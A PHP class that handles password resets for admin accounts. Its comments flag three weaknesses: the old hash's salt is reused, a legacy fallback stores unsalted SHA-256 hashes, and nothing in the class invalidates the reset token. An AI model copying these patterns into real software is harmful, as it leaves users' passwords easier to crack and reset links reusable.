<?php

/*
	
	Handles all tasks required when a user forgets their password

*/

require_once DOCUMENT_ROOT.'app/models/login/m_password.php'; 

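/**
 * Password-reset handler for the accounts stored in `kms_admin`.
 *
 * Reads the stored password hash of a user and, given an activation hash
 * that resolves to an e-mail address, replaces that hash with one derived
 * from the newly chosen password.
 *
 * Security notes for maintainers:
 * - prepare() calls crypt() with the user's CURRENT hash as the salt
 *   argument, so the algorithm, cost and salt of the old hash are carried
 *   over to the new one. The salt is never rotated and a weak legacy
 *   algorithm is never upgraded. Moving to password_hash() /
 *   password_verify() fixes both, but needs the login check (not in this
 *   file) to be reviewed first.
 * - Nothing in this class invalidates the activation hash after a
 *   successful reset. NOTE(review): confirm that the caller or the
 *   Activation model does, otherwise a reset link stays reusable.
 */
class PassHandler
{
	private $_pdo, $_template;
	
	/**
	* Picks up the PDO connection and the template object from the global scope.
	*
	* @access public
	*/
	public function __construct()
	{
		global $pdo, $template;
		
		$this->_pdo = $pdo;
		$this->_template = $template;
	}
	
	/**
	* Gets the hash of the current password
	*
	* @access public
	* @param int $userId id of the row in kms_admin
	* @return string|bool the stored hash, or FALSE when the id is empty,
	*                     the statement cannot be prepared or run, or no
	*                     row (or no hash) exists for that id
	*/ 
	public function get($userId)
	{
		if(empty($userId))
		{
			return FALSE;
		}
		
		$st = $this->_pdo->prepare('SELECT hash FROM kms_admin WHERE id = ?');
		if( ! $st)
		{
			return FALSE;
		}
		
		$st->bindValue(1, $userId);
		if( ! $st->execute())
		{
			return FALSE;
		}
		
		// fetch() yields FALSE when no row matches; reading ->hash from that
		// would raise an error and hand NULL back to the caller.
		$result = $st->fetch(PDO::FETCH_OBJ);
		if( ! is_object($result) || ! isset($result->hash))
		{
			return FALSE;
		}
		
		return $result->hash;
	}
	
	
	/**
	* Stores a new password in the database
	*
	* Validation failures are reported through the template's alerts; a
	* failed activation lookup, user lookup, hashing step or database write
	* returns FALSE without an alert.
	*
	* @access public
	* @param string $new     the new password
	* @param string $confirm the repeated new password
	* @param string $actHash activation hash identifying the reset request
	* @return bool TRUE when the new hash was written, FALSE otherwise
	*/
	public function update($new, $confirm, $actHash)
	{
		if(empty($new) || empty($confirm))
		{
			$this->_template->setAlert('Vul beide velden in a.u.b.', 'warning');	
			return FALSE;
		}
		
		$password = new Password(array(
		'minLength'      => 8,
		'maxLength'      => 30,
		'minNumbers'     => 1,
		'minLetters'     => 1,
		'minLowerCase'   => 1,
		'minUpperCase'   => 1,
		'minSymbols'     => 1,
		'maxSymbols'     => 10,
		'allowedSymbols' => array('#', '_', '-', '!', '?', '@', '[', ']', '=', '~', '*'),));
		
		if( ! $password->validatePassword($new))
		{
			foreach($password->getErrors() as $error)
			{
				$this->_template->setAlert($error, 'error');	
			}
			return FALSE;
		}
		
		// Strict comparison: == would apply PHP's numeric-string juggling
		// to the two inputs instead of comparing them byte for byte.
		if($new !== $confirm)
		{
			$this->_template->setAlert('Uw wachtwoorden komen niet over&eacute;&eacute;n', 'error');	
			return FALSE;
		}
		
		// resolve the activation hash to an e-mail address
		$activation = new Activation(); 
		$actData = $activation->get($actHash);
		if( ! $actData)
		{
			return FALSE;
		}
		
		// resolve the e-mail address to a user id; stop when no user is
		// found so the UPDATE below never runs with an empty id
		$user = new User();
		$userData = $user->getData('email',$actData['email']);
		if(empty($userData['id']))
		{
			return FALSE;
		}
		
		// prepare new hash; FALSE means no usable hash could be produced,
		// and writing that to the hash column would corrupt the account
		$newHash = $this->prepare($new, $userData['id']);
		if($newHash === FALSE)
		{
			return FALSE;
		}
		
		// update new hash
		$stUpdate = $this->_pdo->prepare('UPDATE kms_admin SET hash = ? WHERE id = ? LIMIT 1');
		if( ! $stUpdate)
		{
			return FALSE;
		}
		
		$stUpdate->bindValue(1, $newHash);
		$stUpdate->bindValue(2, $userData['id']);
		
		return $stUpdate->execute() ? TRUE : FALSE;
	}
	
	/**
	* Hashes a password for storage
	*
	* @access private
	* @param string $pass   the plain-text password
	* @param int    $userId id of the user whose current hash supplies the crypt() salt
	* @return string|bool the new hash, or FALSE when none could be produced
	*/
	private function prepare($pass, $userId)
	{
		if(version_compare(PHP_VERSION, '5.3.0') >= 0)
		{
			$currentHash = $this->get($userId);
			if( ! $currentHash)
			{
				// todo crypt with salt (for new passwords)
				// Until that exists, report failure rather than returning
				// an undefined value for the caller to store.
				return FALSE;
			}
			
			// The old hash is passed as the salt argument, so its
			// algorithm and salt are reused (see the class comment).
			$newHash = crypt($pass, $currentHash);
			
			// On failure crypt() returns a marker shorter than 13
			// characters; that must never be stored as a password hash.
			if( ! is_string($newHash) || strlen($newHash) < 13)
			{
				return FALSE;
			}
			
			return $newHash;
		}
		
		// Pre-5.3 fallback: a single unsalted SHA-256, which is not a
		// suitable password hash. Kept only for behavioural compatibility.
		return hash('sha256', $pass);	
	}
}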